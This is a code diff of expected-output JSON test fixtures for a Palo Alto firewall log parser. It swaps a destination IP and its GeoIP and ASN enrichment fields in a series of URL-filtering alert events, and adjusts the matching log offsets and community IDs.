@@ -2439,7 +2336,7 @@ "event.dataset": "panw.panos", "event.kind": "alert", "event.module": "panw", - "event.original": "Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,THREAT,url,1,2012/04/10 04:39:47,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:49,27111,1,59276,80,0,0,0x208000,tcp,alert,\"-/\",(9999),private-ip-addresses,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", + "event.original": "Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,THREAT,url,1,2012/04/10 04:39:47,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:49,27111,1,59276,80,0,0,0x208000,tcp,alert,\"-/\",(9999),private-ip-addresses,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", "event.outcome": "success", "event.severity": 5, "event.timezone": "-02:00", @@ -2451,9 +2348,9 @@ "labels.captive_portal": true, "labels.container_page": true, "log.level": "informational", - "log.offset": 9948, + "log.offset": 9902, "network.application": "web-browsing", - "network.community_id": "1:uslltTePy/m8Gxhk/MgPbZfk6Rg=", + "network.community_id": "1:0JDdHMQ/vA//AOa5kReESUaG4Zc=", "network.direction": "inbound", "network.transport": "tcp", "observer.egress.interface.name": "ethernet1/1", @@ -2485,13 +2382,13 @@ "related.ip": [ "0.0.0.0", "192.168.0.2", - "204.232.231.46" + "67.43.156.12" ], "related.user": [ "crusher" ], "rule.name": "rule1", - "server.ip": "204.232.231.46", + "server.ip": "67.43.156.12", "server.port": 80, "service.type": "panw", "source.address": "192.168.0.2", 
@@ -2511,19 +2408,15 @@ "client.ip": "192.168.0.2", "client.port": 59278, "client.user.name": "crusher", - "destination.address": "204.232.231.46", - "destination.as.number": 27357, - "destination.as.organization.name": "Rackspace Hosting", - "destination.geo.city_name": "Fort Lauderdale", - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 26.1792, - "destination.geo.location.lon": -80.1749, + "destination.address": "67.43.156.12", + "destination.as.number": 35908, + "destination.geo.continent_name": "Asia", + "destination.geo.country_iso_code": "BT", + "destination.geo.country_name": "Bhutan", + "destination.geo.location.lat": 27.5, + "destination.geo.location.lon": 90.5, "destination.geo.name": "United States", - "destination.geo.region_iso_code": "US-FL", - "destination.geo.region_name": "Florida", - "destination.ip": "204.232.231.46", + "destination.ip": "67.43.156.12", "destination.port": 80, "event.action": "url_filtering", "event.category": [ 
@@ -2534,7 +2427,7 @@ "event.dataset": "panw.panos", "event.kind": "alert", "event.module": "panw", - "event.original": "Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,THREAT,url,1,2012/04/10 04:39:48,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,25871,1,59278,80,0,0,0x208000,tcp,alert,\"-/\",(9999),private-ip-addresses,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", + "event.original": "Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,THREAT,url,1,2012/04/10 04:39:48,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,25871,1,59278,80,0,0,0x208000,tcp,alert,\"-/\",(9999),private-ip-addresses,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", "event.outcome": "success", "event.severity": 5, "event.timezone": "-02:00", @@ -2546,9 +2439,9 @@ "labels.captive_portal": true, "labels.container_page": true, "log.level": "informational", - "log.offset": 10341, + "log.offset": 10293, "network.application": "web-browsing", - "network.community_id": "1:WiUImNtgjkeNDi1Qigg7+Y6pDAg=", + "network.community_id": "1:vkRizl1InTFzh8mosWRsH13M1kE=", "network.direction": "inbound", "network.transport": "tcp", "observer.egress.interface.name": "ethernet1/1", @@ -2580,13 +2473,13 @@ "related.ip": [ "0.0.0.0", "192.168.0.2", - "204.232.231.46" + "67.43.156.12" ], "related.user": [ "crusher" ], "rule.name": "rule1", - "server.ip": "204.232.231.46", + "server.ip": "67.43.156.12", "server.port": 80, "service.type": "panw", "source.address": "192.168.0.2", 
@@ -2606,19 +2499,15 @@ "client.ip": "192.168.0.2", "client.port": 59279, "client.user.name": "crusher", - "destination.address": "204.232.231.46", - "destination.as.number": 27357, - "destination.as.organization.name": "Rackspace Hosting", - "destination.geo.city_name": "Fort Lauderdale", - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 26.1792, - "destination.geo.location.lon": -80.1749, + "destination.address": "67.43.156.12", + "destination.as.number": 35908, + "destination.geo.continent_name": "Asia", + "destination.geo.country_iso_code": "BT", + "destination.geo.country_name": "Bhutan", + "destination.geo.location.lat": 27.5, + "destination.geo.location.lon": 90.5, "destination.geo.name": "United States", - "destination.geo.region_iso_code": "US-FL", - "destination.geo.region_name": "Florida", - "destination.ip": "204.232.231.46", + "destination.ip": "67.43.156.12", "destination.port": 80, "event.action": "url_filtering", "event.category": [ 
@@ -2629,7 +2518,7 @@ "event.dataset": "panw.panos", "event.kind": "alert", "event.module": "panw", - "event.original": "Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,THREAT,url,1,2012/04/10 04:39:48,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,26251,1,59279,80,0,0,0x208000,tcp,alert,\"-/\",(9999),private-ip-addresses,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", + "event.original": "Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,THREAT,url,1,2012/04/10 04:39:48,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,26251,1,59279,80,0,0,0x208000,tcp,alert,\"-/\",(9999),private-ip-addresses,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", "event.outcome": "success", "event.severity": 5, "event.timezone": "-02:00", @@ -2641,9 +2530,9 @@ "labels.captive_portal": true, "labels.container_page": true, "log.level": "informational", - "log.offset": 10734, + "log.offset": 10684, "network.application": "web-browsing", - "network.community_id": "1:FmIwID3HJ4Q0574SjlhMHApz/Hs=", + "network.community_id": "1:OUEPS1h8GK3pSmhORzo/qS63sDk=", "network.direction": "inbound", "network.transport": "tcp", "observer.egress.interface.name": "ethernet1/1", @@ -2675,13 +2564,13 @@ "related.ip": [ "0.0.0.0", "192.168.0.2", - "204.232.231.46" + "67.43.156.12" ], "related.user": [ "crusher" ], "rule.name": "rule1", - "server.ip": "204.232.231.46", + "server.ip": "67.43.156.12", "server.port": 80, "service.type": "panw", "source.address": "192.168.0.2", 
@@ -2701,19 +2590,15 @@ "client.ip": "192.168.0.2", "client.port": 59271, "client.user.name": "crusher", - "destination.address": "204.232.231.46", - "destination.as.number": 27357, - "destination.as.organization.name": "Rackspace Hosting", - "destination.geo.city_name": "Fort Lauderdale", - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 26.1792, - "destination.geo.location.lon": -80.1749, + "destination.address": "67.43.156.12", + "destination.as.number": 35908, + "destination.geo.continent_name": "Asia", + "destination.geo.country_iso_code": "BT", + "destination.geo.country_name": "Bhutan", + "destination.geo.location.lat": 27.5, + "destination.geo.location.lon": 90.5, "destination.geo.name": "United States", - "destination.geo.region_iso_code": "US-FL", - "destination.geo.region_name": "Florida", - "destination.ip": "204.232.231.46", + "destination.ip": "67.43.156.12", "destination.port": 80, "event.action": "url_filtering", "event.category": [ 
@@ -2724,7 +2609,7 @@ "event.dataset": "panw.panos", "event.kind": "alert", "event.module": "panw", - "event.original": "Oct 30 09:46:42 1,2012/10/30 09:46:42,01606001116,THREAT,url,1,2012/04/10 04:39:45,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:47,24816,1,59271,80,0,0,0x208000,tcp,alert,\"-/\",(9999),private-ip-addresses,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", + "event.original": "Oct 30 09:46:42 1,2012/10/30 09:46:42,01606001116,THREAT,url,1,2012/04/10 04:39:45,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:47,24816,1,59271,80,0,0,0x208000,tcp,alert,\"-/\",(9999),private-ip-addresses,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", "event.outcome": "success", "event.severity": 5, "event.timezone": "-02:00", @@ -2736,9 +2621,9 @@ "labels.captive_portal": true, "labels.container_page": true, "log.level": "informational", - "log.offset": 11127, + "log.offset": 11075, "network.application": "web-browsing", - "network.community_id": "1:6AuZBrHKsUJjLNgm/mJ5QToaPo8=", + "network.community_id": "1:kqTI1IhQmPp1s0yUMx4LhKDTEDM=", "network.direction": "inbound", "network.transport": "tcp", "observer.egress.interface.name": "ethernet1/1", @@ -2770,13 +2655,13 @@ "related.ip": [ "0.0.0.0", "192.168.0.2", - "204.232.231.46" + "67.43.156.12" ], "related.user": [ "crusher" ], "rule.name": "rule1", - "server.ip": "204.232.231.46", + "server.ip": "67.43.156.12", "server.port": 80, "service.type": "panw", "source.address": "192.168.0.2", 
@@ -2796,19 +2681,15 @@ "client.ip": "192.168.0.2", "client.port": 59269, "client.user.name": "crusher", - "destination.address": "204.232.231.46", - "destination.as.number": 27357, - "destination.as.organization.name": "Rackspace Hosting", - "destination.geo.city_name": "Fort Lauderdale", - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 26.1792, - "destination.geo.location.lon": -80.1749, + "destination.address": "67.43.156.12", + "destination.as.number": 35908, + "destination.geo.continent_name": "Asia", + "destination.geo.country_iso_code": "BT", + "destination.geo.country_name": "Bhutan", + "destination.geo.location.lat": 27.5, + "destination.geo.location.lon": 90.5, "destination.geo.name": "United States", - "destination.geo.region_iso_code": "US-FL", - "destination.geo.region_name": "Florida", - "destination.ip": "204.232.231.46", + "destination.ip": "67.43.156.12", "destination.port": 80, "event.action": "url_filtering", "event.category": [ 
@@ -2819,7 +2700,7 @@ "event.dataset": "panw.panos", "event.kind": "alert", "event.module": "panw", - "event.original": "Oct 30 09:46:42 1,2012/10/30 09:46:42,01606001116,THREAT,url,1,2012/04/10 04:39:45,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:47,25062,1,59269,80,0,0,0x208000,tcp,alert,\"-/\",(9999),private-ip-addresses,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", + "event.original": "Oct 30 09:46:42 1,2012/10/30 09:46:42,01606001116,THREAT,url,1,2012/04/10 04:39:45,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:47,25062,1,59269,80,0,0,0x208000,tcp,alert,\"-/\",(9999),private-ip-addresses,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", "event.outcome": "success", "event.severity": 5, "event.timezone": "-02:00", @@ -2831,9 +2712,9 @@ "labels.captive_portal": true, "labels.container_page": true, "log.level": "informational", - "log.offset": 11520, + "log.offset": 11466, "network.application": "web-browsing", - "network.community_id": "1:NwAT+gtzMjRwKS71Tn+YaKwyOvI=", + "network.community_id": "1:PxgPFY7HoFKuk8lEU5b6qy1RpZM=", "network.direction": "inbound", "network.transport": "tcp", "observer.egress.interface.name": "ethernet1/1", @@ -2865,13 +2746,13 @@ "related.ip": [ "0.0.0.0", "192.168.0.2", - "204.232.231.46" + "67.43.156.12" ], "related.user": [ "crusher" ], "rule.name": "rule1", - "server.ip": "204.232.231.46", + "server.ip": "67.43.156.12", "server.port": 80, "service.type": "panw", "source.address": "192.168.0.2", 
@@ -2891,19 +2772,15 @@ "client.ip": "192.168.0.2", "client.port": 59270, "client.user.name": "crusher", - "destination.address": "204.232.231.46", - "destination.as.number": 27357, - "destination.as.organization.name": "Rackspace Hosting", - "destination.geo.city_name": "Fort Lauderdale", - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 26.1792, - "destination.geo.location.lon": -80.1749, + "destination.address": "67.43.156.12", + "destination.as.number": 35908, + "destination.geo.continent_name": "Asia", + "destination.geo.country_iso_code": "BT", + "destination.geo.country_name": "Bhutan", + "destination.geo.location.lat": 27.5, + "destination.geo.location.lon": 90.5, "destination.geo.name": "United States", - "destination.geo.region_iso_code": "US-FL", - "destination.geo.region_name": "Florida", - "destination.ip": "204.232.231.46", + "destination.ip": "67.43.156.12", "destination.port": 80, "event.action": "url_filtering", "event.category": [ 
@@ -2914,7 +2791,7 @@ "event.dataset": "panw.panos", "event.kind": "alert", "event.module": "panw", - "event.original": "Oct 30 09:46:42 1,2012/10/30 09:46:42,01606001116,THREAT,url,1,2012/04/10 04:39:45,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:47,26266,1,59270,80,0,0,0x208000,tcp,alert,\"-/\",(9999),private-ip-addresses,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", + "event.original": "Oct 30 09:46:42 1,2012/10/30 09:46:42,01606001116,THREAT,url,1,2012/04/10 04:39:45,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:47,26266,1,59270,80,0,0,0x208000,tcp,alert,\"-/\",(9999),private-ip-addresses,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", "event.outcome": "success", "event.severity": 5, "event.timezone": "-02:00", @@ -2926,9 +2803,9 @@ "labels.captive_portal": true, "labels.container_page": true, "log.level": "informational", - "log.offset": 11913, + "log.offset": 11857, "network.application": "web-browsing", - "network.community_id": "1:mTTbk9h6Dgx6lH3l4aEHguufZVE=", + "network.community_id": "1:mB6gyhRnEZzJ5f8dg12zlL2lIC4=", "network.direction": "inbound", "network.transport": "tcp", "observer.egress.interface.name": "ethernet1/1", @@ -2960,13 +2837,13 @@ "related.ip": [ "0.0.0.0", "192.168.0.2", - "204.232.231.46" + "67.43.156.12" ], "related.user": [ "crusher" ], "rule.name": "rule1", - "server.ip": "204.232.231.46", + "server.ip": "67.43.156.12", "server.port": 80, "service.type": "panw", "source.address": "192.168.0.2", 
@@ -2986,19 +2863,15 @@ "client.ip": "192.168.0.2", "client.port": 59274, "client.user.name": "crusher", - "destination.address": "204.232.231.46", - "destination.as.number": 27357, - "destination.as.organization.name": "Rackspace Hosting", - "destination.geo.city_name": "Fort Lauderdale", - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 26.1792, - "destination.geo.location.lon": -80.1749, + "destination.address": "67.43.156.12", + "destination.as.number": 35908, + "destination.geo.continent_name": "Asia", + "destination.geo.country_iso_code": "BT", + "destination.geo.country_name": "Bhutan", + "destination.geo.location.lat": 27.5, + "destination.geo.location.lon": 90.5, "destination.geo.name": "United States", - "destination.geo.region_iso_code": "US-FL", - "destination.geo.region_name": "Florida", - "destination.ip": "204.232.231.46", + "destination.ip": "67.43.156.12", "destination.port": 80, "event.action": "url_filtering", "event.category": [ 
@@ -3009,7 +2882,7 @@ "event.dataset": "panw.panos", "event.kind": "alert", "event.module": "panw", - "event.original": "Oct 30 09:46:42 1,2012/10/30 09:46:42,01606001116,THREAT,url,1,2012/04/10 04:39:46,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:48,23898,1,59274,80,0,0,0x208000,tcp,alert,\"-/\",(9999),private-ip-addresses,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", + "event.original": "Oct 30 09:46:42 1,2012/10/30 09:46:42,01606001116,THREAT,url,1,2012/04/10 04:39:46,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:48,23898,1,59274,80,0,0,0x208000,tcp,alert,\"-/\",(9999),private-ip-addresses,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", "event.outcome": "success", "event.severity": 5, "event.timezone": "-02:00", @@ -3021,9 +2894,9 @@ "labels.captive_portal": true, "labels.container_page": true, "log.level": "informational", - "log.offset": 12306, + "log.offset": 12248, "network.application": "web-browsing", - "network.community_id": "1:/0xM0KlMLwieymkDApfqS3/WWiQ=", + "network.community_id": "1:85UBXOVwZbnWWb+ZE7zvB6j8D6o=", "network.direction": "inbound", "network.transport": "tcp", "observer.egress.interface.name": "ethernet1/1", @@ -3055,13 +2928,13 @@ "related.ip": [ "0.0.0.0", "192.168.0.2", - "204.232.231.46" + "67.43.156.12" ], "related.user": [ "crusher" ], "rule.name": "rule1", - "server.ip": "204.232.231.46", + "server.ip": "67.43.156.12", "server.port": 80, "service.type": "panw", "source.address": "192.168.0.2", 
@@ -3081,19 +2954,15 @@ "client.ip": "192.168.0.2", "client.port": 59273, "client.user.name": "crusher", - "destination.address": "204.232.231.46", - "destination.as.number": 27357, - "destination.as.organization.name": "Rackspace Hosting", - "destination.geo.city_name": "Fort Lauderdale", - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 26.1792, - "destination.geo.location.lon": -80.1749, + "destination.address": "67.43.156.12", + "destination.as.number": 35908, + "destination.geo.continent_name": "Asia", + "destination.geo.country_iso_code": "BT", + "destination.geo.country_name": "Bhutan", + "destination.geo.location.lat": 27.5, + "destination.geo.location.lon": 90.5, "destination.geo.name": "United States", - "destination.geo.region_iso_code": "US-FL", - "destination.geo.region_name": "Florida", - "destination.ip": "204.232.231.46", + "destination.ip": "67.43.156.12", "destination.port": 80, "event.action": "url_filtering", "event.category": [ 
@@ -3104,7 +2973,7 @@ "event.dataset": "panw.panos", "event.kind": "alert", "event.module": "panw", - "event.original": "Oct 30 09:46:42 1,2012/10/30 09:46:42,01606001116,THREAT,url,1,2012/04/10 04:39:46,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:48,25259,1,59273,80,0,0,0x208000,tcp,alert,\"-/\",(9999),private-ip-addresses,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", + "event.original": "Oct 30 09:46:42 1,2012/10/30 09:46:42,01606001116,THREAT,url,1,2012/04/10 04:39:46,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:48,25259,1,59273,80,0,0,0x208000,tcp,alert,\"-/\",(9999),private-ip-addresses,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", "event.outcome": "success", "event.severity": 5, "event.timezone": "-02:00", @@ -3116,9 +2985,9 @@ "labels.captive_portal": true, "labels.container_page": true, "log.level": "informational", - "log.offset": 12699, + "log.offset": 12639, "network.application": "web-browsing", - "network.community_id": "1:VLKKVfau50s2qjTDcucU+VKCAqY=", + "network.community_id": "1:yycaucLRKClR6ShHLwUoe7RB7Kw=", "network.direction": "inbound", "network.transport": "tcp", "observer.egress.interface.name": "ethernet1/1", @@ -3150,13 +3019,13 @@ "related.ip": [ "0.0.0.0", "192.168.0.2", - "204.232.231.46" + "67.43.156.12" ], "related.user": [ "crusher" ], "rule.name": "rule1", - "server.ip": "204.232.231.46", + "server.ip": "67.43.156.12", "server.port": 80, "service.type": "panw", "source.address": "192.168.0.2", 
@@ -3176,19 +3045,15 @@ "client.ip": "192.168.0.2", "client.port": 59272, "client.user.name": "crusher", - "destination.address": "204.232.231.46", - "destination.as.number": 27357, - "destination.as.organization.name": "Rackspace Hosting", - "destination.geo.city_name": "Fort Lauderdale", - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 26.1792, - "destination.geo.location.lon": -80.1749, + "destination.address": "67.43.156.12", + "destination.as.number": 35908, + "destination.geo.continent_name": "Asia", + "destination.geo.country_iso_code": "BT", + "destination.geo.country_name": "Bhutan", + "destination.geo.location.lat": 27.5, + "destination.geo.location.lon": 90.5, "destination.geo.name": "United States", - "destination.geo.region_iso_code": "US-FL", - "destination.geo.region_name": "Florida", - "destination.ip": "204.232.231.46", + "destination.ip": "67.43.156.12", "destination.port": 80, "event.action": "url_filtering", "event.category": [ 
@@ -3199,7 +3064,7 @@
 "event.dataset": "panw.panos",
 "event.kind": "alert",
 "event.module": "panw",
- "event.original": "Oct 30 09:46:42 1,2012/10/30 09:46:42,01606001116,THREAT,url,1,2012/04/10 04:39:46,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:48,26466,1,59272,80,0,0,0x208000,tcp,alert,\"-/\",(9999),private-ip-addresses,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html",
+ "event.original": "Oct 30 09:46:42 1,2012/10/30 09:46:42,01606001116,THREAT,url,1,2012/04/10 04:39:46,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:48,26466,1,59272,80,0,0,0x208000,tcp,alert,\"-/\",(9999),private-ip-addresses,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html",
 "event.outcome": "success",
 "event.severity": 5,
 "event.timezone": "-02:00",
@@ -3211,9 +3076,9 @@
 "labels.captive_portal": true,
 "labels.container_page": true,
 "log.level": "informational",
- "log.offset": 13092,
+ "log.offset": 13030,
 "network.application": "web-browsing",
- "network.community_id": "1:jAvA0C85T0GFKryKA312lLEtKIM=",
+ "network.community_id": "1:IIS8d7UhbebihBbi99LWmWlcCpY=",
 "network.direction": "inbound",
 "network.transport": "tcp",
 "observer.egress.interface.name": "ethernet1/1",
@@ -3245,13 +3110,13 @@
 "related.ip": [
 "0.0.0.0",
 "192.168.0.2",
- "204.232.231.46"
+ "67.43.156.12"
 ],
 "related.user": [
 "crusher"
 ],
 "rule.name": "rule1",
- "server.ip": "204.232.231.46",
+ "server.ip": "67.43.156.12",
 "server.port": 80,
 "service.type": "panw",
 "source.address": "192.168.0.2",
@@ -3272,13 +3137,6 @@
 "client.port": 59261,
 "client.user.name": "crusher",
 "destination.address": "69.43.161.167",
- "destination.as.number": 22489,
- "destination.as.organization.name": "Castle Access Inc",
- "destination.geo.continent_name": "North America",
- "destination.geo.country_iso_code": "US",
- "destination.geo.country_name": "United States",
- "destination.geo.location.lat": 37.751,
- "destination.geo.location.lon": -97.822,
 "destination.geo.name": "United States",
 "destination.ip": "69.43.161.167",
 "destination.port": 80,
@@ -3302,7 +3160,7 @@
 "input.type": "log",
 "labels.captive_portal": true,
 "log.level": "informational",
- "log.offset": 13485,
+ "log.offset": 13421,
 "network.application": "web-browsing",
 "network.community_id": "1:Jqiwb/u74kolY3Y1yGkp+oMAxT4=",
 "network.direction": "inbound",
@@ -3370,13 +3228,6 @@
 "client.port": 59248,
 "client.user.name": "crusher",
 "destination.address": "202.31.187.154",
- "destination.as.number": 17848,
- "destination.as.organization.name": "INAMES",
- "destination.geo.continent_name": "Asia",
- "destination.geo.country_iso_code": "KR",
- "destination.geo.country_name": "South Korea",
- "destination.geo.location.lat": 37.5112,
- "destination.geo.location.lon": 126.9741,
 "destination.geo.name": "Korea Republic Of",
 "destination.ip": "202.31.187.154",
 "destination.port": 80,
@@ -3400,7 +3251,7 @@
 "input.type": "log",
 "labels.captive_portal": true,
 "log.level": "informational",
- "log.offset": 13889,
+ "log.offset": 13825,
 "network.application": "web-browsing",
 "network.community_id": "1:q84mXt2kLt843wk0Y5vtvJwq+bc=",
 "network.direction": "inbound",
@@ -3468,13 +3319,6 @@
 "client.port": 59251,
 "client.user.name": "crusher",
 "destination.address": "89.111.176.67",
- "destination.as.number": 41126,
- "destination.as.organization.name": "CJSC Registrar R01",
- "destination.geo.continent_name": "Europe",
- "destination.geo.country_iso_code": "RU",
- "destination.geo.country_name": "Russia",
- "destination.geo.location.lat": 55.7386,
- "destination.geo.location.lon": 37.6068,
 "destination.geo.name": "Russian Federation",
 "destination.ip": "89.111.176.67",
 "destination.port": 80,
@@ -3498,7 +3342,7 @@
 "input.type": "log",
 "labels.captive_portal": true,
 "log.level": "informational",
- "log.offset": 14313,
+ "log.offset": 14249,
 "network.application": "web-browsing",
 "network.community_id": "1:1jDSU+BTdTOAQSrWGRbSjxehwNg=",
 "network.direction": "inbound",
@@ -3564,19 +3408,15 @@
 "client.ip": "192.168.0.2",
 "client.port": 59244,
 "client.user.name": "crusher",
- "destination.address": "204.232.231.46",
- "destination.as.number": 27357,
- "destination.as.organization.name": "Rackspace Hosting",
- "destination.geo.city_name": "Fort Lauderdale",
- "destination.geo.continent_name": "North America",
- "destination.geo.country_iso_code": "US",
- "destination.geo.country_name": "United States",
- "destination.geo.location.lat": 26.1792,
- "destination.geo.location.lon": -80.1749,
+ "destination.address": "67.43.156.12",
+ "destination.as.number": 35908,
+ "destination.geo.continent_name": "Asia",
+ "destination.geo.country_iso_code": "BT",
+ "destination.geo.country_name": "Bhutan",
+ "destination.geo.location.lat": 27.5,
+ "destination.geo.location.lon": 90.5,
 "destination.geo.name": "United States",
- "destination.geo.region_iso_code": "US-FL",
- "destination.geo.region_name": "Florida",
- "destination.ip": "204.232.231.46",
+ "destination.ip": "67.43.156.12",
 "destination.port": 80,
 "event.action": "url_filtering",
 "event.category": [
@@ -3587,7 +3427,7 @@
 "event.dataset": "panw.panos",
 "event.kind": "alert",
 "event.module": "panw",
- "event.original": "Oct 30 09:47:12 1,2012/10/30 09:47:12,01606001116,THREAT,url,1,2012/04/10 04:39:36,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:37,26076,1,59244,80,0,0,0x200000,tcp,block-url,\"onlinescanxpp.com/land/eurl/1.php?code=\",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,",
+ "event.original": "Oct 30 09:47:12 1,2012/10/30 09:47:12,01606001116,THREAT,url,1,2012/04/10 04:39:36,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:37,26076,1,59244,80,0,0,0x200000,tcp,block-url,\"onlinescanxpp.com/land/eurl/1.php?code=\",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,",
 "event.outcome": "success",
 "event.severity": 5,
 "event.timezone": "-02:00",
@@ -3598,9 +3438,9 @@
 "input.type": "log",
 "labels.captive_portal": true,
 "log.level": "informational",
- "log.offset": 14717,
+ "log.offset": 14653,
 "network.application": "web-browsing",
- "network.community_id": "1:vGp9HpobYZmzzLGyDAG6oVAe4dg=",
+ "network.community_id": "1:owrRdnl67haRQOD4YVhMjTnR9n8=",
 "network.direction": "inbound",
 "network.transport": "tcp",
 "observer.egress.interface.name": "ethernet1/1",
@@ -3635,13 +3475,13 @@
 "related.ip": [
 "0.0.0.0",
 "192.168.0.2",
- "204.232.231.46"
+ "67.43.156.12"
 ],
 "related.user": [
 "crusher"
 ],
 "rule.name": "rule1",
- "server.ip": "204.232.231.46",
+ "server.ip": "67.43.156.12",
 "server.port": 80,
 "service.type": "panw",
 "source.address": "192.168.0.2",
@@ -3666,13 +3506,6 @@
 "client.port": 59237,
 "client.user.name": "crusher",
 "destination.address": "208.73.210.29",
- "destination.as.number": 40034,
- "destination.as.organization.name": "Confluence Networks Inc",
- "destination.geo.continent_name": "North America",
- "destination.geo.country_iso_code": "US",
- "destination.geo.country_name": "United States",
- "destination.geo.location.lat": 37.751,
- "destination.geo.location.lon": -97.822,
 "destination.geo.name": "United States",
 "destination.ip": "208.73.210.29",
 "destination.port": 80,
@@ -3696,7 +3529,7 @@
 "input.type": "log",
 "labels.captive_portal": true,
 "log.level": "informational",
- "log.offset": 15135,
+ "log.offset": 15069,
 "network.application": "web-browsing",
